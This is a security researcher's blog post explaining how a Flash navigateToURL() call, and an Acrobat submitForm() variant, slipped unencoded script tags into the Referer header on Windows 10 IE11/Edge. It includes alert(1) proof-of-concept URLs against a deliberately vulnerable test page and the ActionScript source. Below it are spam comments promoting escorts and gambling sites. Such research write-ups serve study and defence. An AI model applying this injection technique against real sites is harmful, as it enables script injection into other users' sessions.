Thursday, October 6, 2016

XSS via Referrer After Anniversary Update

Since the Windows 10 anniversary update, it seems that Microsoft killed some XSS tricks on IE11/Edge. The referrer behavior is one of them.

The following page writes the HTTP_REFERER and document.referrer directly:
https://vulnerabledoma.in/xss_referrer

Previously IE/Edge did not encode the "<> characters in the referrer string. So, we could XSS on that page from the following PoC:
https://l0.cm/xss_referrer_oldpoc.html?<script>alert("1")</script>

But since the Windows 10 anniversary update, IE11/Edge encodes it. You will get the following encoded string from that page:
HTTP_REFERER: https://l0.cm/xss_referrer_oldpoc.html?%3Cscript%3Ealert(%221%22)%3C/script%3E
document.referrer: https://l0.cm/xss_referrer_oldpoc.html?%3Cscript%3Ealert(%221%22)%3C/script%3E
Too bad!
Of course, we can still use Win8.1/7 IE11. But also we want to XSS on Win10, don't you? :D

Today, I would like to introduce a small technique, XSS using the referrer on latest Win10 Edge/IE11.

The technique is very simple. You can easily include "<> string into the referrer if you send the request from Flash's navigateToURL() method, like this:

https://l0.cm/xss_referrer.swf?<script>alert(1)</script>

The ActionScript code is here:
package {
 import flash.display.Sprite;
 import flash.net.URLRequest;
 import flash.net.navigateToURL;
 public class xss_referrer extends Sprite{
  public function xss_referrer() {
   var url:URLRequest = new URLRequest("https://vulnerabledoma.in/xss_referrer");
   navigateToURL(url, "_self");
  }
 }
}
As you can see the access result, we can XSS via the Referer request header. But sadly, we cannot XSS via the document.referrer property because it becomes empty. Dang :p

FYI, also I can reproduce it via the submitForm() method of JavaScript for Acrobat API.

I confirmed it on Win10 IE11 with Adobe Reader plugin.

PoC is here:
https://l0.cm/xss_referrer.pdf?<script>alert(1)</script>

It seems that the request via plugins is not considered.

That's it. It might be helpful in some cases :)
Thanks!

12 comments:

  1. To do Not Pressure OR Anything, But Have Ever This considered post there is statement PT Lampung Service this is a
    Service HP Bandar Lampung whose looking to do day
    Service iPhone Lampung to this looking then to that is
    Jasa Kursus Service HP I will try it.
    Jasa Kursus Service HP They have jumping places and so that the device other kid's activity.Youtuber Lampung , Thanks ! Visit Back.

    ReplyDelete
  2. Independent Escorts in Dubai is the right decision. the top Dubai Escorts at your one Click. Log on to us for entertainment.

    ReplyDelete
  3. Thank you for another informative blog. Where else could I get that type of info written in such a perfect approach? I have an undertaking that I’m simply now working on, and I’ve been on the lookout for such information.
    Moviesflix

    ReplyDelete
  4. That's for sure. He could become the future Paul Scholes at Nachester United, he has the outstanding quality of a midfielder to be a great player.”
    A bizarre penalty took place in the FA รีวิวคาสิโน
    Cup second round when the referees decided to give non-league side Ebbsfleet the penalty despite their players stubbornly falling on their own. Plus, it also contributed to Ebbsfleet's qualification.

    ReplyDelete
  5. โป๊กเกอร์ เป็นอีกหนึ่งเกมไพ่ที่จะมีผู้เล่นมากกว่า 2 คน ขึ้นไป และมีผู้ชนะเพียงแค่ 1 คน หรือเสมอกันเท่านั้น ซึ่งในปัจจุบันโป๊กเกอร์ก็เป็นเกมไพ่ที่มีผู้คนนิยมเล่นมากที่สุดของโลก https://pokerdee55.com/

    ReplyDelete
  6. This blog iswhat im exactly looking for. Great! and Thanks to you. 메이저사이트

    ReplyDelete
  7. What an interesting article! I'm glad i finally found what i was looking for.
    온라인경마
    경마사이트

    ReplyDelete
  8. I am overwhelmed by your post with such a nice topic. Usually I visit your site and get updated through the information you include but today’s blog would be the most appreciable. 바카라

    ReplyDelete